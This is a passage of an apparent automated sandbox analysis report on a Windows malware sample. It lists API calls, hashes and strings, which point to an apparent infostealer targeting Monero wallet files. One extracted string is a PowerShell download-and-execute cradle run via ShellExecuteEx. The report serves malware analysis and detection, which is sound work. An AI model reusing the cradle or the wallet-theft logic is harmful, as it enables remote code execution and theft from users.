                      • lstrcat.KERNEL32(?,00E8D0D8), ref: 0047486F
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 00478D90: GetFileAttributesA.KERNEL32(00000000,?,00461B54,?,?,0048564C,?,?,00480E1F), ref: 00478D9F
                        • Part of subcall function 00474570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00474580
                        • Part of subcall function 00474570: RtlAllocateHeap.NTDLL(00000000), ref: 00474587
                        • Part of subcall function 00474570: wsprintfA.USER32 ref: 004745A6
                        • Part of subcall function 00474570: FindFirstFileA.KERNEL32(?,?), ref: 004745BD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                      • String ID:
                      • API String ID: 2540262943-0
                      • Opcode ID: da3694c2000756db86c66a7d858cebafb0487c499ea828783f09dc088fec2de5
                      • Instruction ID: cd2469a825fbe7f8ef36383af40438c7c55875f0e7450c9fd79d8798b0909c71
                      • Opcode Fuzzy Hash: da3694c2000756db86c66a7d858cebafb0487c499ea828783f09dc088fec2de5
                      • Instruction Fuzzy Hash: CA3144F294020867CB54F7B0DC85EE97379AB58704F40458EB31996091EF78A789CF95
                      Function 00472C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00472D85
                      Strings
                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00472CC4
                      • <, xrefs: 00472D39
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00472D04
                      • ')", xrefs: 00472CB3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      • API String ID: 3031569214-898575020
                      • Opcode ID: 7a07e19d42d0ff025c22883e52c01b2a54d859d60a2a1afa8a872bf16c94c212
                      • Instruction ID: 986d51b734814894456aaa3ea15fc6a4ded32ac61b7b3754cfcedce49d7a640f
                      • Opcode Fuzzy Hash: 7a07e19d42d0ff025c22883e52c01b2a54d859d60a2a1afa8a872bf16c94c212
                      • Instruction Fuzzy Hash: ED41D171C101089ADB14FFA1C891FEEB774AF50304F50852EF11AA7191DF786A5ACFAA
                      Function 00469E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                      Download Yara Rule
                      APIs
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00469F41
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$AllocLocal
                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                      • API String ID: 4171519190-1096346117
                      • Opcode ID: 3e3d37abea82647b42a459ffd09d13c68478ed836bbbd35716ef0610fc2d88fd
                      • Instruction ID: a4cd5df7ce6256658d08e04ea828f41b63851be32c037e04062876aaf1e74c84
                      • Opcode Fuzzy Hash: 3e3d37abea82647b42a459ffd09d13c68478ed836bbbd35716ef0610fc2d88fd
                      • Instruction Fuzzy Hash: 67616570910248EBDB18EFA5CC96FEE7775AF44304F00841AF90A5F191EB786A16CB57
                      Function 004740B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000001,00E8D398,00000000,00020119,?), ref: 004740F4
                      • RegQueryValueExA.ADVAPI32(?,00E8DB48,00000000,00000000,00000000,000000FF), ref: 00474118
                      • RegCloseKey.ADVAPI32(?), ref: 00474122
                      • lstrcat.KERNEL32(?,00000000), ref: 00474147
                      • lstrcat.KERNEL32(?,00E8DBA8), ref: 0047415B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$CloseOpenQueryValue
                      • String ID:
                      • API String ID: 690832082-0
                      • Opcode ID: 5cd129d67b95eb0cf7c3b100541985a04ba5f85bc9881942e33df7a8d2ff71bd
                      • Instruction ID: 31f420bc6999b52519b3011dc27ae3ffb44cbdd3ce21179def7b1ce17032b4dd
                      • Opcode Fuzzy Hash: 5cd129d67b95eb0cf7c3b100541985a04ba5f85bc9881942e33df7a8d2ff71bd
                      • Instruction Fuzzy Hash: EB419BB690010867DB14FBE0DC46FFE737DA789304F04855EB61A56181EB796B88CB92
                      Function 00477E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00477E37
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00477E3E
                      • RegOpenKeyExA.ADVAPI32(80000002,00E7B738,00000000,00020119,?), ref: 00477E5E
                      • RegQueryValueExA.ADVAPI32(?,00E8D238,00000000,00000000,000000FF,000000FF), ref: 00477E7F
                      • RegCloseKey.ADVAPI32(?), ref: 00477E92
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: a6c918ef0723c20a0cfce7e3c21d3c57eeb5de5c8ecff088af6a4260ca9f1afe
                      • Instruction ID: c7495ab74c6121929d67dfe6cf1d463d4162fb0dd30291dc104b32e21a859da3
                      • Opcode Fuzzy Hash: a6c918ef0723c20a0cfce7e3c21d3c57eeb5de5c8ecff088af6a4260ca9f1afe
                      • Instruction Fuzzy Hash: 86118FB1A44205EBD700DFD4DD49FBBBBB9EB05B00F10815AF605A7280D7786801CFA2
                      Function 00479260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                      Download Yara Rule
                      APIs
                      • StrStrA.SHLWAPI(00E8D8F0,?,?,?,0047140C,?,00E8D8F0,00000000), ref: 0047926C
                      • lstrcpyn.KERNEL32(006AAB88,00E8D8F0,00E8D8F0,?,0047140C,?,00E8D8F0), ref: 00479290
                      • lstrlen.KERNEL32(?,?,0047140C,?,00E8D8F0), ref: 004792A7
                      • wsprintfA.USER32 ref: 004792C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpynlstrlenwsprintf
                      • String ID: %s%s
                      • API String ID: 1206339513-3252725368
                      • Opcode ID: a76973ff48cecb53a9b45e934089e22b09d78d095a6717a051955200a2f89464
                      • Instruction ID: 472218a9a2e8e7580937b8457e110c82fdb4912c060f832d8bbb4cab07ec0d58
                      • Opcode Fuzzy Hash: a76973ff48cecb53a9b45e934089e22b09d78d095a6717a051955200a2f89464
                      • Instruction Fuzzy Hash: A701E575500108FFCB04EFE8C988EAE7BBAEB49350F108549F9098B201C735AE40DFA5
                      Function 004612A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004612B4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 004612BB
                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004612D7
                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004612F5
                      • RegCloseKey.ADVAPI32(?), ref: 004612FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: 45b261b9d4da57bc4227515ddbaa43924e7f096c6ab3543ea230632570e74356
                      • Instruction ID: 46f377f02281ea25ea5cdea9e4339c0f3c4180363738ed4953d0dfb501dece75
                      • Opcode Fuzzy Hash: 45b261b9d4da57bc4227515ddbaa43924e7f096c6ab3543ea230632570e74356
                      • Instruction Fuzzy Hash: E70131B9A40208BFDB00DFE0DC49FAEB7B9EB48701F00819AFA0597280D774AA01CF51
                      Function 0047C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: String___crt$Type
                      • String ID:
                      • API String ID: 2109742289-3916222277
                      • Opcode ID: 57eda2573f95f51a32562fd86631a8c673b42fe037bc90b370fb0829d44593ca
                      • Instruction ID: 7cbfaa614aca787118130c0421ac3ee0a30fd163612b44e4a9af11e87e55f80f
                      • Opcode Fuzzy Hash: 57eda2573f95f51a32562fd86631a8c673b42fe037bc90b370fb0829d44593ca
                      • Instruction Fuzzy Hash: 0E4125F150078C5EDB318B248CC4BFBBBEC9F45308F1484EDEA8E86182D2759A458F69
                      Function 00476630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00476663
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00476726
                      • ExitProcess.KERNEL32 ref: 00476755
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                      • String ID: <
                      • API String ID: 1148417306-4251816714
                      • Opcode ID: 4eddc07d7ca674d0ddd428a7e00e04ce25bc6d2777f5f2acdee16f8fdb8f1690
                      • Instruction ID: 1168d7090b5f78d56eec7848a04d610073ccb23b1786c759035f169956b2e70e
                      • Opcode Fuzzy Hash: 4eddc07d7ca674d0ddd428a7e00e04ce25bc6d2777f5f2acdee16f8fdb8f1690
                      • Instruction Fuzzy Hash: B6312BF1801208AADB54EB91DC85BDE7778AF44304F40919EF31966191DF786B48CF6A
                      Function 004787C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00480E28,00000000,?), ref: 0047882F
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00478836
                      • wsprintfA.USER32 ref: 00478850
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                      • String ID: %dx%d
                      • API String ID: 1695172769-2206825331
                      • Opcode ID: 97e931ddd3ecdd92d0fd12e19acb4d88bc4dfbaae7f9370a95d063526f71542c
                      • Instruction ID: 9e3e0d07a541a29a9c3fae760bdecd8ee63beeaaf78cadb22e9c744c912bca9f
                      • Opcode Fuzzy Hash: 97e931ddd3ecdd92d0fd12e19acb4d88bc4dfbaae7f9370a95d063526f71542c
                      • Instruction Fuzzy Hash: 8C21EFB1A40204ABDB04EFD4DD45FAEB7B9FB49711F10411AF605A7280C779A901CFA5
                      Function 00478D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0047951E,00000000), ref: 00478D5B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00478D62
                      • wsprintfW.USER32 ref: 00478D78
                      Strings
                      Memory Dump Source
